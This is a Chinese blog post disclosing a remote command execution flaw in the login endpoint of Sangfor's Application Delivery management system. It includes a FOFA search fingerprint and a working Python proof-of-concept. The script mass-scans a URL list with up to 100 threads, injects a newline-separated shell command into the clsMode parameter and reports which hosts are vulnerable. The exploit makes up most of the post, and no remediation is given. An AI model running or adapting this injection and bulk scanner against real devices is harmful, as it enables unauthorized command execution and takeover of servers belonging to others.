深信服 应用交付管理系统 login 存在远程命令执行漏洞

已于 2023-08-20 13:01:24 修改
阅读量1.2k 收藏 1
点赞数
文章标签: 网络安全 web安全
于 2023-08-20 09:28:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52333295/article/details/132388819
版权

深信服 应用交付管理系统 login 存在远程命令执行漏洞

漏洞描述

深信服 应用交付管理系统 login 存在远程命令执行漏洞,攻击者通过漏洞可以获取服务器权限,执行任意命令

漏洞影响

深信服 应用交付管理系统 7.0.8-7.0.8R5

网络测绘

fid=“iaytNA57019/kADk8Nev7g==”

漏洞复现

请添加图片描述

漏洞poc

import argparse
import warnings
from concurrent.futures import ThreadPoolExecutor


import requests


NUM_THREADS = 10  # 默认线程数为10




def send_post_request(url, data):
    hd = {
        "Host": url,
        "Connection": "close",
        "sec-ch-ua": "\"Not/A)Brand\";v=\"99\", \"Google Chrome\";v=\"115\", \"Chromium\";v=\"115\"",
        "Accept": "*/*",
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "X-Requested-With": "XMLHttpRequest",
        "sec-ch-ua-mobile": "?0",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36",
        "sec-ch-ua-platform": "\"Windows\"",
        "Origin": f"https://{url}",
        "Sec-Fetch-Site": "same-origin",
        "Sec-Fetch-Mode": "cors",
        "Sec-Fetch-Dest": "empty",
        "Referer": f"https://{url}/rep/login",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "zh-CN,zh;q=0.9"
    }


    try:
        response = requests.post(f"https://{url}/rep/login", headers=hd, data=data, verify=False)
        return response.text
    except requests.exceptions.RequestException as e:
        return str(e)




def scan_url(url):
    data = "clsMode=cls_mode_login%0Als%0A&index=index&log_type=report&loginType=account&page=login&rnd=0&userID=admin&userPsw=123"
    response = send_post_request(url, data)
    if "etc" in response:
        print(url + " is vuln!")




def main():
    parser = argparse.ArgumentParser(description='发送POST请求的命令行工具')
    parser.add_argument('-f', '--filepath', required=True, help='包含URL列表的txt文件路径')
    parser.add_argument('-t', '--threads', type=int, default=NUM_THREADS, help='线程数,默认为10')
    args = parser.parse_args()


    filepath = args.filepath
    threads = min(args.threads, 100)  # 最大线程数为100
    data = "clsMode=cls_mode_login%0Als%0A&index=index&log_type=report&loginType=account&page=login&rnd=0&userID=admin&userPsw=123"
    warnings.filterwarnings("ignore")
    try:
        with open(filepath, 'r') as file:
            urls = file.read().splitlines()
    except FileNotFoundError:
        print(f"文件 {filepath} 不存在")
        return


    with ThreadPoolExecutor(max_workers=threads) as executor:
        executor.map(scan_url, urls)




if __name__ == '__main__':
    main()
Evoit
关注
深信服应用交付管理系统远程命令执行漏洞复现
薛定谔嘚喵博客
09-07 1313
深信服应用交付管理系统login存在远程命令执行漏洞,攻击者通过漏洞可以获取服务器权限,执行任意命令
【1day】复现深信服应用交付管理系统 login 远程命令执行漏洞和账号密码泄漏漏洞
记录并分享学习安全的知识点..
08-16 835
深信服 应用交付管理系统 文件sys_user.conf可在未授权的情况下直接访问,导致账号密码泄漏;深信服 应用交付管理系统 login 存在远程命令执行漏洞,攻击者通过漏洞可以获取服务器权限,执行任意命令
深信服应用交付报表系统 命令执行漏洞复现
09-28 1711
深信服应用交付报表系统是深信服最新推出的应用交付系列设备,其突出特色就是SINFOR AD的智能分析功能。该系统能够为用户提供包括多数据中心负载均衡、多链路负载均衡、服务器负载均衡的全方位解决方案。不仅实现对各个数据中心、链路以及服务器状态的实时监控,同时根据预设规则,将用户的访问请求分配给相应的数据中心、链路以及服务。
深信服 应用交付管理系统 sys_user.conf 账号密码泄漏漏洞
weixin_46801402的博客
11-04 2923
深信服 应用交付管理系统 sys_user.conf 账号密码泄漏漏洞
深信服 应用交付报表系统 download.php 任意文件读取漏洞
weixin_46801402的博客
11-04 1323
深信服 应用交付报表系统 download.php 任意文件读取漏洞
深信服应用交付报表系统存在任意文件读取漏洞
nnn2188185的博客
06-15 1139
微信公众号搜索:南风漏洞复现文库该文章 南风漏洞复现文库 公众号首发深信服应用交付报表系统。
深信服应用交付管理系统 login 远程命令执行漏洞(含批量验证poc)
weixin_43567873的博客
04-15 635
深信服应用交付管理系统 login 远程命令执行漏洞(含批量验证poc)
深信服应用交付 AD 存在远程命令执行漏洞 附POC
nnn2188185的博客
09-28 588
深信服应用交付管理系统login存在远程命令执行漏洞,攻击者通过漏洞可以获取服务器权限,执行任意命令
CNVD-2020-46552 深信服EDR命令执行漏洞
nnn2188185的博客
03-22 1012
深信服终端监测响应平台(EDR)存在远程命令执行漏洞。攻击者可通过构造HTTP请求来利用此漏洞,成功利用此漏洞的攻击者可以在目标主机上执行任意命令
深信服应用交付报表任意文件读取漏洞
剁椒鱼头没剁椒的博客
02-10 2047
深信服应用交付报表系统 download.php文件存在任意文件读取漏洞,攻击者通过漏洞可以下载服务器任意文件。
深信服应用交付AD用户手册_V7.0.8R3-20201223.pdf
03-18
深信服应用交付AD用户手册_V7.0.8R3-20201223.pdf
深信服AD应用交付管理维护
✍千里之行,始于足下 ^,^
07-05 3495
深信服AD应用交付管理维护1.监视器1.1 节点监视器(1) ping,ping6节点监视器(2)http,https节点监视器(3)FTP节点监视器(4)DNS节点监视器(5)Radius节点监视器1.2 链路监视器2.常用功能2.1 路由配置(1)静态路由(2)动态路由2.2 NAT配置2.3 网络安全2.4 配置备份与恢复2.5 设备升级(1)AD应用交付控制台页面升级(2) AD应用交付升...
技术分享 某下一代防火墙远程命令执行漏洞分析及防护绕过_深信服下一代防火墙ngaf login远程命令执行漏洞(1)
最新发布
2301_76224593的博客
04-29 952
1=hex2bin // 绕过写法。
深信服应用交付报表系统任意文件读取漏洞复现
薛定谔嘚喵博客
09-07 745
SINFOR AD是深信服最新推出的应用交付系列设备,其突出特色就是SINFOR AD的智能分析功能。深信服应用交付报表系统存在任意文件读取漏洞,攻击者利用漏洞可读取设备中的指定路径文件
【1day】复现深信服数据中心管理系统 XXE漏洞——可读取文件
记录并分享学习安全的知识点..
08-16 431
深信服的数据中心管理系统DC是一种外置的AC(异地扩展备份管理)数据中心,它提供了强大的功能和灵活性,旨在满足日志数据处理的需求。该系统具备多种高级功能,包括多条件组合的高效查询、统计和生成趋势报表,以及实时监控设备的运行状态等。深信服数据中心管理系统存在XXE漏洞
技术分享 | 某下一代防火墙远程命令执行漏洞分析及防护绕过
m0_46699477的博客
10-26 1550
在本文中,我们对某下一代防火墙的命令执行漏洞进行了分析,并发现了命令执行无回显等限制。
深信服-应用交付-负载配置操作记录
qq_35460812的博客
10-17 680
记录一下,开发过程中项目集群部署后,使用深信服应用交付平台的配置过程。
漏洞复现 || SXF应用交付系统RCE(0Day)
失心少年
08-24 470
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!SXF应用交付管理系统login存在远程命令执行漏洞,攻击者通过漏洞可以获取服务器权限,执行任意命令。1.利用如下POC发起POST请求。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值